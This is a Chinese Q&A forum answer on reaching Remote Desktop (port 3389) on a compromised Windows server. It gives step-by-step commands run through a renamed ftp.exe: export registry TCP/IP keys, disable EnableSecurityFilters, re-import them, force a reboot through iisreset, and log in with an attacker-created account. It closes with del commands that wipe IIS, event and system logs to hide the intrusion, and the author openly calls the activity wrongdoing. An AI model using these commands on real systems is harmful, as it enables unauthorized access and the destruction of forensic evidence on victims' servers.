3389远程桌面
发布网友
发布时间:2022-05-14 21:07
共1个回答
热心网友
时间:2023-10-30 07:46
D:\ftp.exe "regedit -e D:\.1reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip" 导出注册表里关于TCP/IP筛选的第一处
D:\ftp.exe "regedit -e D:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip" 导出注册表里关于TCP/IP筛选的第i二处
D:\ftp.exe "regedit -e D:\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" 导出注册表里关于TCP/IP筛选的第三处
然后下载到自己的PC里,使用记事本编辑,然后ctrl+F搜索EnableSecurityFilters"=dword:00000001这个参数,把它改成EnableSecurityFilters"=dword:00000000。 把1.reg,2.reg,3.reg都改过来,然后上传回服务器路径中,我又上传到了D盘里,~好了,把刚才编辑的1,2,3都导入注册表中。
D:\ftp.exe "regedit -s D:\1.reg" 直接将1.reg导入到注册表中
另外两个也一样。
然后在执行
D:\ftp.exe "iisreset /reboot /timeout:00" 利用他自身的iis服务来重新启动他的机器,/timeout:00这个参数是让他立即重新启动,也就是一小会,访问网站,已经访问不进去了,差不多几分钟后,可以访问了,直接登陆3389,输入我建立的用户名,ok了。我们的提权访问工作也做完了。最好也把日志清一下,做坏事了嘛,下面是日志存放文件,在DOS下运行一下就ok了,不在需要用用别的工具了。
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
